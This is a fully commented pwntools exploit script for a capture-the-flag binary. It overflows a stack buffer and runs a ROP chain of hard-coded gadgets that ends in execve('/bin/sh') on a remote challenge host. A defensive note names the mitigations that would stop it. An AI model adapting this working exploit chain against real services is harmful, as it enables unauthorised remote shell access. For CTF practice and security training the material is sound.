from pwn import *
# CTF exploit script for the "aquabank-armory" challenge: a stack buffer
# overflow in the service's input handler is turned into a
# return-oriented-programming (ROP) chain that ends in execve("/bin/sh").
# No address leak is performed, so every address below is a constant;
# this presumes the binary is loaded at a fixed base (non-PIE, likely a
# static build given the 0x40xxxx/0x4Axxxx addresses) -- not verifiable
# from this file alone.
# Defensive note: a stack canary, PIE + ASLR, or a bounds check on the
# input read would each break this chain; the same hard-coded offsets
# are also a good signature for detection if the service logs inputs.

# Number of filler bytes between the start of the overflowed buffer and
# the saved return address. Determined elsewhere (e.g. under a debugger);
# not derivable from this file.
OFF = 64

# Loading the binary sets context (arch, endianness) so p64()/flat()
# pack values correctly for it. checksec output is suppressed.
context.binary = elf = ELF("./aquabank-armory", checksec=False)

# Local target, kept for debugging; the remote instance is used below.
# p = process(elf.path)

# Remote challenge instance.
p = remote("offsec.m0lecon.it", 13540)

# Consume the service banner before sending the payload.
# NOTE(review): pwntools' recvline() signature is (keepends, timeout); the
# bytes argument lands in `keepends`, which is merely truthy, so this reads
# one line and only works by coincidence. recvuntil(...) is probably what
# was intended -- verify.
print(p.recvline(b"[armory] Storeroom open -- pick your weapons:\n"))

# Gadget addresses in the binary. Each name describes the instruction
# sequence the author expects at that address (e.g. `pop rdi ; ret`);
# the actual bytes are not visible from this file.
ret = 0x000000000040101A
syscall = 0x0000000000401324
pop_rdi = 0x000000000040196E
pop_rsi = 0x0000000000401977
pop_rdx = 0x0000000000401980
pop_rax = 0x00000000004214EB
# Writable address used as scratch space to hold the program path.
writable = 0x4AC000
# `mov qword ptr [rdx], rax ; ret` -- the write primitive used to place
# the path string into `writable`.
mov_qword_ptr_rdx_rax = 0x000000000040AB08

# NUL-terminated program path; exactly 8 bytes, so one qword store suffices.
shellstr = b"/bin/sh\x00"

# Chain layout, executed top to bottom once the overwritten return
# address is popped:
#   1. ret                      -- extra return, presumably for 16-byte
#                                  stack alignment (purpose assumed)
#   2. rdx = writable; rax = "/bin/sh\0"; [rdx] = rax
#                               -- stores the path at `writable`
#   3. rax = 59 (execve on x86-64), rdi = writable, rsi = 0, rdx = 0
#   4. syscall                  -- execve("/bin/sh", NULL, NULL)
# flat() concatenates the pieces; wrapping ints in p64() is redundant
# (flat() packs ints per context) but harmless.
payload = flat(
    b"A" * OFF,                   # filler up to the saved return address
    p64(ret),
    p64(pop_rdx),
    p64(writable),                # rdx = scratch address
    p64(pop_rax),
    shellstr,                     # rax = the 8 raw bytes of "/bin/sh\0"
    p64(mov_qword_ptr_rdx_rax),   # *(rdx) = rax
    p64(pop_rax),
    p64(59),                      # rax = SYS_execve
    p64(pop_rdi),
    p64(writable),                # rdi = pathname
    p64(pop_rsi),
    p64(0),                       # rsi = argv (NULL)
    p64(pop_rdx),
    p64(0),                       # rdx = envp (NULL)
    p64(syscall),
)

# Deliver the overflow and hand the resulting shell to the user.
p.sendline(payload)
p.interactive()